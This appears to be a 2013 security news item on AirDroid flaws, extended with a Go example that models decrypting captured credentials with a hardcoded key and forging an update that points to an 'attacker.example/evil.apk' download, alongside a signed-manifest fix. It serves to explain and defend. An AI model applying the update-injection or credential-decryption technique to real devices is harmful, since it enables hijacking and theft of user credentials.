- Jun 9, 2013
Multiple vulnerabilities have been found in AirDroid, which leave millions of users exposed to man-in-the-middle (MITM) attacks, information leakage and remote hijacking.
AirDroid, a popular remote management tool for Android with an estimated user base of more than 50 million devices, relies on insecure communication channels to send the data used to authenticate the device to a statistics server, according to researchers at Zimperium's zLabs.
Such requests are encrypted; however, the encryption key is hardcoded inside the application itself, so anyone who unpacks the app has it. Any malicious party on the same network as the target device could therefore execute a MITM attack, decrypt the captured traffic to obtain the device's authentication credentials, and impersonate the user in further requests to the AirDroid API endpoints.
For instance, an attacker performing a MITM attack and redirecting the app's HTTP traffic through a malicious transparent proxy could modify the response to the /phone/vncupgrade request, which the application normally uses to check for add-ons and updates. Because the client accepts any response it can decrypt with the shared key, the attacker can inject a fake update and thereby execute arbitrary code on the target device.
According to an analysis by Simone Margaritelli, a zLabs researcher, the vendor acknowledged the flaws, but the software was still vulnerable when a new update was released on Nov. 24. No patch has been made available.
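The two weaknesses described above, reduced to a runnable model. This is an added example, not AirDroid's code or the zLabs proof of concept, and it is written in Go rather than the app's own Java. Everything specific is an assumption for illustration: the key value, AES-GCM as the cipher (the article does not say which cipher AirDroid uses), the form-encoded field names, the attacker URL, and the Ed25519-signed manifest as the hardened alternative. The first half shows why "encrypted" traffic under a key that ships in the APK gives no confidentiality or authenticity against an on-path attacker; the second half shows the fix for the update path, where the app holds only a public key and the proxy cannot produce a valid signature.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/ed25519"
	"crypto/rand"
	"errors"
	"fmt"
	"net/url"
)

// hardcodedKey stands in for the key compiled into the app; anyone who unpacks
// the APK has it. Placeholder value chosen for this example, not AirDroid's key.
var hardcodedKey = []byte("0123456789abcdef") // 16 bytes: AES-128

func must[T any](v T, err error) T {
	if err != nil {
		panic(err) // only reachable on a bad key length or a failed RNG read
	}
	return v
}

// SealWithAppKey encrypts a form body under the shared key (AES-GCM, random
// nonce prepended). The app uses it for its requests; so can the attacker.
func SealWithAppKey(v url.Values) []byte {
	gcm := must(cipher.NewGCM(must(aes.NewCipher(hardcodedKey))))
	nonce := make([]byte, gcm.NonceSize())
	must(rand.Read(nonce))
	return gcm.Seal(nonce, nonce, []byte(v.Encode()), nil)
}

// OpenWithAppKey decrypts and parses a SealWithAppKey message. The on-path
// attacker calls it on the captured auth request; the vulnerable client calls it
// on the /phone/vncupgrade response. A clean decrypt proves nothing about the
// sender, because every copy of the app holds the same key.
func OpenWithAppKey(wire []byte) (url.Values, error) {
	gcm := must(cipher.NewGCM(must(aes.NewCipher(hardcodedKey))))
	n := gcm.NonceSize()
	if len(wire) < n {
		return nil, errors.New("message shorter than nonce")
	}
	pt, err := gcm.Open(nil, wire[:n], wire[n:], nil)
	if err != nil {
		return nil, err
	}
	return url.ParseQuery(string(pt))
}

// DeviceSendsAuth is the client side: constructed device-auth fields, encrypted
// and then sent to the statistics server over plain HTTP.
func DeviceSendsAuth(deviceID, token string) []byte {
	return SealWithAppKey(url.Values{"device_id": {deviceID}, "token": {token}})
}

// AttackerForgesUpdate is the transparent proxy swapping the update response
// for a manifest it encrypted itself under the same shared key.
func AttackerForgesUpdate(apkURL string) []byte {
	return SealWithAppKey(url.Values{"version": {"99.0"}, "url": {apkURL}})
}

// Hardened variant: manifests are signed with a vendor private key that never
// ships in the app; the app embeds only the public key. Wire = signature || body.
func NewVendorKeys() (ed25519.PublicKey, ed25519.PrivateKey) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		panic(err)
	}
	return pub, priv
}

func SignManifest(priv ed25519.PrivateKey, version, apkURL string) []byte {
	body := []byte(url.Values{"version": {version}, "url": {apkURL}}.Encode())
	return append(ed25519.Sign(priv, body), body...)
}

// HardenedUpdateCheck installs only what the vendor key signed: a proxy that
// holds the app's symmetric key but not the vendor's private key is rejected.
func HardenedUpdateCheck(vendorPub ed25519.PublicKey, wire []byte) (string, error) {
	if len(wire) < ed25519.SignatureSize {
		return "", errors.New("manifest too short")
	}
	sig, body := wire[:ed25519.SignatureSize], wire[ed25519.SignatureSize:]
	if !ed25519.Verify(vendorPub, body, sig) {
		return "", errors.New("manifest not signed by vendor key: update rejected")
	}
	vals, err := url.ParseQuery(string(body))
	if err != nil {
		return "", err
	}
	return vals.Get("url"), nil
}

func main() {
	leaked, _ := OpenWithAppKey(DeviceSendsAuth("dev-42", "s3cr3t-token"))
	forged, _ := OpenWithAppKey(AttackerForgesUpdate("http://attacker.example/evil.apk"))
	fmt.Println("attacker read token:", leaked.Get("token"), "| vulnerable client installs:", forged.Get("url"))
	vendorPub, _ := NewVendorKeys()
	_, attackerPriv := NewVendorKeys()
	_, err := HardenedUpdateCheck(vendorPub, SignManifest(attackerPriv, "99.0", "http://attacker.example/evil.apk"))
	fmt.Println("hardened client:", err)
}
```

Running it prints the token recovered from the captured request and the attacker-controlled URL a client trusting the shared key would fetch, followed by the rejection from the signed-manifest check. Signing the manifest closes the update-injection path but not the credential leak: that part needs the statistics request to go over TLS, with certificate pinning given that the attacker sits on the local network, and no secret at all living in the APK.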
Read more: Multiple Vulns in AirDroid Opens Millions to MITM, Hijacking